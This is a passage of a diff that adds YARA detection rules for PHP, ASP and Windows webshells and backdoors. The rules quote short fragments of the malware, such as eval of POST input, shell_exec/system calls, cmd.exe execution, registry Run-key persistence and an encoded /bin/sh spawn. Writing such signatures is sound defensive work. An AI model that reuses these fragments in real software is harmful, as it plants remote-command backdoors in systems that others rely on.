+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
+	strings:
+		$s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
+		$s12 = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword
+		$s17 = "name=\"duzenx2\" value=\"Klas" fullword
+	condition:
+		2 of them
+}
+rule WebShell_Generic_PHP_1 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
+		hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
+		hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
+		hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
+	strings:
+		$s1 = "$token = substr($_REQUEST['command'], 0, $length);" fullword
+		$s4 = "var command_hist = new Array(<?php echo $js_command_hist ?>);" fullword
+		$s7 = "$_SESSION['output'] .= htmlspecialchars(fgets($io[1])," fullword
+		$s9 = "document.shell.command.value = command_hist[current_line];" fullword
+		$s16 = "$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $"
+		$s19 = "if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {" fullword
+		$s20 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword
+	condition:
+		5 of them
+}
+rule WebShell_Generic_PHP_2 {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
+		$s4 = "\\$port = {$_POST['port']};" fullword
+		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
+		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
+		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
+	condition:
+		4 of them
+}
+rule WebShell__CrystalShell_v_1_erne_stres {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s1 = "<input type='submit' value='  open (shill.txt) '>" fullword
+		$s4 = "var_dump(curl_exec($ch));" fullword
+		$s7 = "if(empty($_POST['Mohajer22'])){" fullword
+		$s10 = "$m=$_POST['curl'];" fullword
+		$s13 = "$u1p=$_POST['copy'];" fullword
+		$s14 = "if(empty(\\$_POST['cmd'])){" fullword
+		$s15 = "$string = explode(\"|\",$string);" fullword
+		$s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
+	condition:
+		5 of them
+}
+rule WebShell_Generic_PHP_3 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
+		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
+		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
+		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
+	strings:
+		$s0 = "header('Content-Length:'.filesize($file).'');" fullword
+		$s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
+		$s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
+		$s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
+		$s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_4 {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
+		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
+		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
+		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
+		$s10 = "foreach ($arr as $filename) {" fullword
+		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_5 {
+	meta:
+		description = "PHP Webshells Github Archive - from files ex0shell.php, megabor.php, GRP WebShell 2.0 release build 2018 (C)2006,Great.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "64461ad8d8f23ea078201a31d747157f701a4e00"
+		hash1 = "3df1afbcfa718da6fc8af27554834ff6d1a86562"
+		hash2 = "ad86ef7f24f75081318146edc788e5466722a629"
+	strings:
+		$s0 = "(($perms & 0x0400) ? 'S' : '-'));" fullword
+		$s10 = "} elseif (($perms & 0x8000) == 0x8000) {" fullword
+		$s11 = "if (($perms & 0xC000) == 0xC000) {" fullword
+		$s12 = "$info .= (($perms & 0x0008) ?" fullword
+		$s16 = "// Block special" fullword
+		$s18 = "$info = 's';" fullword
+	condition:
+		all of them
+}
+rule WebShell_GFS {
+	meta:
+		description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
+		hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
+		hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
+	strings:
+		$s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
+		$s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
+		$s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
+	condition:
+		all of them
+}
+rule WebShell__CrystalShell_v_1_sosyete_stres {
+	meta:
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
+		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
+		$s11 = "scrollbar-darkshadow-color: #101842;" fullword
+		$s15 = "<a bookmark=\"minipanel\">" fullword
+		$s16 = "background-color: #EBEAEA;" fullword
+		$s18 = "color: #D5ECF9;" fullword
+		$s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_10 {
+	meta:
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+		hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
+	strings:
+		$s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
+		$s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
+		$s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
+		$s12 = "else if( $mode & 0xA000 ) " fullword
+		$s17 = "$s=sprintf(\"%1s\", $type); " fullword
+		$s20 = "font-size: 8pt;" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_11 {
+	meta:
+		description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
+		hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
+		hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
+		hash3 = "80aba3348434c66ac471daab949871ab16c50042"
+	strings:
+		$s5 = "$filename = $backupstring.\"$filename\";" fullword
+		$s6 = "while ($file = readdir($folder)) {" fullword
+		$s7 = "if($file != \".\" && $file != \"..\")" fullword
+		$s9 = "$backupstring = \"copy_of_\";" fullword
+		$s10 = "if( file_exists($file_name))" fullword
+		$s13 = "global $file_name, $filename;" fullword
+		$s16 = "copy($file,\"$filename\");" fullword
+		$s18 = "<td width=\"49%\" height=\"142\">" fullword
+	condition:
+		all of them
+}
+rule WebShell__findsock_php_findsock_shell_php_reverse_shell {
+	meta:
+		description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
+		hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
+		hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
+	strings:
+		$s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
+	condition:
+		all of them
+}
+rule WebShell_Generic_PHP_6 {
+	meta:
+		description = "PHP Webshells Github Archive - from files c0derz shell [csh] v. 0.1.1 release.php, CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+		author = "Florian Roth"
+		super_rule = 1
+		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
+		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
+		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+	strings:
+		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
+		$s5 = "echo shell_exec($com);" fullword
+		$s7 = "if($sertype == \"winda\"){" fullword
+		$s8 = "function execute($com)" fullword
+		$s12 = "echo decode(execute($cmd));" fullword
+		$s15 = "echo system($com);" fullword
+	condition:
+		4 of them
+}
+
+rule Unpack_Injectt {
+	meta:
+		description = "Webshells Auto-generated - file Injectt.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8a5d2158a566c87edc999771e12d42c5"
+	strings:
+		$s2 = "%s -Run                              -->To Install And Run The Service"
+		$s3 = "%s -Uninstall                        -->To Uninstall The Service"
+		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_fso {
+	meta:
+		description = "Webshells Auto-generated - file fso.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b37f3cde1a08890bd822a182c3a881f6"
+	strings:
+		$s0 = "<!-- PageFSO Below -->"
+		$s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_ssh {
+	meta:
+		description = "Webshells Auto-generated - file ssh.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1aa5307790d72941589079989b4f900e"
+	strings:
+		$s0 = "eval(gzinflate(str_rot13(base64_decode('"
+	condition:
+		all of them
+}
+rule Debug_BDoor {
+	meta:
+		description = "Webshells Auto-generated - file BDoor.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "e4e8e31dd44beb9320922c5f49739955"
+	strings:
+		$s1 = "\\BDoor\\"
+		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
+	condition:
+		all of them
+}
+rule bin_Client {
+	meta:
+		description = "Webshells Auto-generated - file Client.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5f91a5b46d155cacf0cc6673a2a5461b"
+	strings:
+		$s0 = "Recieved respond from server!!"
+		$s4 = "packet door client"
+		$s5 = "input source port(whatever you want):"
+		$s7 = "Packet sent,waiting for reply..."
+	condition:
+		all of them
+}
+rule ZXshell2_0_rar_Folder_ZXshell {
+	meta:
+		description = "Webshells Auto-generated - file ZXshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "246ce44502d2f6002d720d350e26c288"
+	strings:
+		$s0 = "WPreviewPagesn"
+		$s1 = "DA!OLUTELY N"
+	condition:
+		all of them
+}
+rule RkNTLoad {
+	meta:
+		description = "Webshells Auto-generated - file RkNTLoad.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "262317c95ced56224f136ba532b8b34f"
+	strings:
+		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s2 = "5pur+virtu!"
+		$s3 = "ugh spac#n"
+		$s4 = "xcEx3WriL4"
+		$s5 = "runtime error"
+		$s6 = "loseHWait.Sr."
+		$s7 = "essageBoxAw"
+		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
+	condition:
+		all of them
+}
+rule binder2_binder2 {
+	meta:
+		description = "Webshells Auto-generated - file binder2.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d594e90ad23ae0bc0b65b59189c12f11"
+	strings:
+		$s0 = "IsCharAlphaNumericA"
+		$s2 = "WideCharToM"
+		$s4 = "g 5pur+virtu!"
+		$s5 = "\\syslog.en"
+		$s6 = "heap7'7oqk?not="
+		$s8 = "- Kablto in"
+	condition:
+		all of them
+}
+rule thelast_orice2 {
+	meta:
+		description = "Webshells Auto-generated - file orice2.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "aa63ffb27bde8d03d00dda04421237ae"
+	strings:
+		$s0 = " $aa = $_GET['aa'];"
+		$s1 = "echo $aa;"
+	condition:
+		all of them
+}
+rule FSO_s_sincap {
+	meta:
+		description = "Webshells Auto-generated - file sincap.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
+	strings:
+		$s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
+		$s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
+	condition:
+		all of them
+}
+rule PhpShell {
+	meta:
+		description = "Webshells Auto-generated - file PhpShell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "539baa0d39a9cf3c64d65ee7a8738620"
+	strings:
+		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
+	condition:
+		all of them
+}
+rule HYTop_DevPack_config {
+	meta:
+		description = "Webshells Auto-generated - file config.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b41d0e64e64a685178a3155195921d61"
+	strings:
+		$s0 = "const adminPassword=\""
+		$s2 = "const userPassword=\""
+		$s3 = "const mVersion="
+	condition:
+		all of them
+}
+rule sendmail {
+	meta:
+		description = "Webshells Auto-generated - file sendmail.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "75b86f4a21d8adefaf34b3a94629bd17"
+	strings:
+		$s3 = "_NextPyC808"
+		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
+	condition:
+		all of them
+}
+rule FSO_s_zehir4 {
+	meta:
+		description = "Webshells Auto-generated - file zehir4.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+	strings:
+		$s5 = " byMesaj "
+	condition:
+		all of them
+}
+rule hkshell_hkshell {
+	meta:
+		description = "Webshells Auto-generated - file hkshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "168cab58cee59dc4706b3be988312580"
+	strings:
+		$s1 = "PrSessKERNELU"
+		$s2 = "Cur3ntV7sion"
+		$s3 = "Explorer8"
+	condition:
+		all of them
+}
+
+rule iMHaPFtp {
+	meta:
+		description = "Webshells Auto-generated - file iMHaPFtp.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "12911b73bc6a5d313b494102abcf5c57"
+	strings:
+		$s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"
+	condition:
+		all of them
+}
+rule Unpack_TBack {
+	meta:
+		description = "Webshells Auto-generated - file TBack.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a9d1007823bf96fb163ab38726b48464"
+	strings:
+		$s5 = "\\final\\new\\lcc\\public.dll"
+	condition:
+		all of them
+}
+rule DarkSpy105 {
+	meta:
+		description = "Webshells Auto-generated - file DarkSpy105.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f0b85e7bec90dba829a3ede1ab7d8722"
+	strings:
+		$s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
+	condition:
+		all of them
+}
+rule EditServer_3 {
+	meta:
+		description = "Webshells Auto-generated - file EditServer.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f945de25e0eba3bdaf1455b3a62b9832"
+	strings:
+		$s2 = "Server %s Have Been Configured"
+		$s5 = "The Server Password Exceeds 32 Characters"
+		$s8 = "9--Set Procecess Name To Inject DLL"
+	condition:
+		all of them
+}
+rule FSO_s_reader {
+	meta:
+		description = "Webshells Auto-generated - file reader.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
+	strings:
+		$s2 = "mailto:mailbomb@hotmail."
+	condition:
+		all of them
+}
+rule ASP_CmdAsp {
+	meta:
+		description = "Webshells Auto-generated - file CmdAsp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "79d4f3425f7a89befb0ef3bafe5e332f"
+	strings:
+		$s2 = "' -- Read the output from our command and remove the temp file -- '"
+		$s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+		$s9 = "' -- create the COM objects that we will be using -- '"
+	condition:
+		all of them
+}
+rule KA_uShell {
+	meta:
+		description = "Webshells Auto-generated - file KA_uShell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "685f5d4f7f6751eaefc2695071569aab"
+	strings:
+		$s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"
+		$s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"
+	condition:
+		all of them
+}
+rule PHP_Backdoor_v1 {
+	meta:
+		description = "Webshells Auto-generated - file PHP Backdoor v1.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0506ba90759d11d78befd21cabf41f3d"
+	strings:
+
+		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
+		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
+	condition:
+		all of them
+}
+rule svchostdll {
+	meta:
+		description = "Webshells Auto-generated - file svchostdll.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0f6756c8cb0b454c452055f189e4c3f4"
+	strings:
+		$s0 = "InstallService"
+		$s1 = "RundllInstallA"
+		$s2 = "UninstallService"
+		$s3 = "&G3 Users In RegistryD"
+		$s4 = "OL_SHUTDOWN;I"
+		$s5 = "SvcHostDLL.dll"
+		$s6 = "RundllUninstallA"
+		$s7 = "InternetOpenA"
+		$s8 = "Check Cloneomplete"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_server {
+	meta:
+		description = "Webshells Auto-generated - file server.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1d38526a215df13c7373da4635541b43"
+	strings:
+		$s0 = "<!-- PageServer Below -->"
+	condition:
+		all of them
+}
+rule vanquish {
+	meta:
+		description = "Webshells Auto-generated - file vanquish.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "684450adde37a93e8bb362994efc898c"
+	strings:
+		$s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
+		$s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
+		$s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
+	condition:
+		all of them
+}
+rule winshell {
+	meta:
+		description = "Webshells Auto-generated - file winshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3144410a37dd4c29d004a814a294ea26"
+	strings:
+		$s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"
+		$s1 = "WinShell Service"
+		$s2 = "__GLOBAL_HEAP_SELECTED"
+		$s3 = "__MSVCRT_HEAP_SELECT"
+		$s4 = "Provide Windows CmdShell Service"
+		$s5 = "URLDownloadToFileA"
+		$s6 = "RegisterServiceProcess"
+		$s7 = "GetModuleBaseNameA"
+		$s8 = "WinShell v5.0 (C)2002 janker.org"
+	condition:
+		all of them
+}
+rule FSO_s_remview {
+	meta:
+		description = "Webshells Auto-generated - file remview.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+	strings:
+		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
+		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
+		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
+	condition:
+		all of them
+}
+rule saphpshell {
+	meta:
+		description = "Webshells Auto-generated - file saphpshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d7bba8def713512ddda14baf9cd6889a"
+	strings:
+		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006Z {
+	meta:
+		description = "Webshells Auto-generated - file 2006Z.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "fd1b6129abd4ab177fed135e3b665488"
+	strings:
+		$s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"
+		$s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
+	condition:
+		all of them
+}
+rule admin_ad {
+	meta:
+		description = "Webshells Auto-generated - file admin-ad.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
+	strings:
+		$s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
+		$s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
+	condition:
+		all of them
+}
+rule FSO_s_casus15 {
+	meta:
+		description = "Webshells Auto-generated - file casus15.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+	strings:
+		$s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"
+	condition:
+		all of them
+}
+rule BIN_Client {
+	meta:
+		description = "Webshells Auto-generated - file Client.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
+	strings:
+		$s0 = "=====Remote Shell Closed====="
+		$s2 = "All Files(*.*)|*.*||"
+		$s6 = "WSAStartup Error!"
+		$s7 = "SHGetFileInfoA"
+		$s8 = "CreateThread False!"
+		$s9 = "Port Number Error"
+	condition:
+		4 of them
+}
+rule shelltools_g0t_root_uptime {
+	meta:
+		description = "Webshells Auto-generated - file uptime.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
+	strings:
+		$s0 = "JDiamondCSlC~"
+		$s1 = "CharactQA"
+		$s2 = "$Info: This file is packed with the UPX executable packer $"
+		$s5 = "HandlereateConso"
+		$s7 = "ION\\System\\FloatingPo"
+	condition:
+		all of them
+}
+rule Simple_PHP_BackDooR {
+	meta:
+		description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a401132363eecc3a1040774bec9cb24f"
+	strings:
+		$s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
+		$s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
+		$s9 = "// a simple php backdoor"
+	condition:
+		1 of them
+}
+rule sig_2005Gray {
+	meta:
+		description = "Webshells Auto-generated - file 2005Gray.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "75dbe3d3b70a5678225d3e2d78b604cc"
+	strings:
+		$s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
+		$s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+		$s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
+	condition:
+		all of them
+}
+rule DllInjection {
+	meta:
+		description = "Webshells Auto-generated - file DllInjection.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a7b92283a5102886ab8aee2bc5c8d718"
+	strings:
+		$s0 = "\\BDoor\\DllInjecti"
+	condition:
+		all of them
+}
+rule Mithril_v1_45_Mithril {
+	meta:
+		description = "Webshells Auto-generated - file Mithril.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f1484f882dc381dde6eaa0b80ef64a07"
+	strings:
+		$s2 = "cress.exe"
+		$s7 = "\\Debug\\Mithril."
+	condition:
+		all of them
+}
+rule hkshell_hkrmv {
+	meta:
+		description = "Webshells Auto-generated - file hkrmv.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
+	strings:
+		$s5 = "/THUMBPOSITION7"
+		$s6 = "\\EvilBlade\\"
+	condition:
+		all of them
+}
+rule phpshell {
+	meta:
+		description = "Webshells Auto-generated - file phpshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1dccb1ea9f24ffbd085571c88585517b"
+	strings:
+		$s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
+		$s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
+		$s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
+	condition:
+		all of them
+}
+rule FSO_s_cmd {
+	meta:
+		description = "Webshells Auto-generated - file cmd.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cbe8e365d41dd3cd8e462ca434cf385f"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
+		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_phpft {
+	meta:
+		description = "Webshells Auto-generated - file phpft.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "60ef80175fcc6a879ca57c54226646b1"
+	strings:
+		$s6 = "PHP Files Thief"
+		$s11 = "http://www.4ngel.net"
+	condition:
+		all of them
+}
+rule FSO_s_indexer {
+	meta:
+		description = "Webshells Auto-generated - file indexer.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
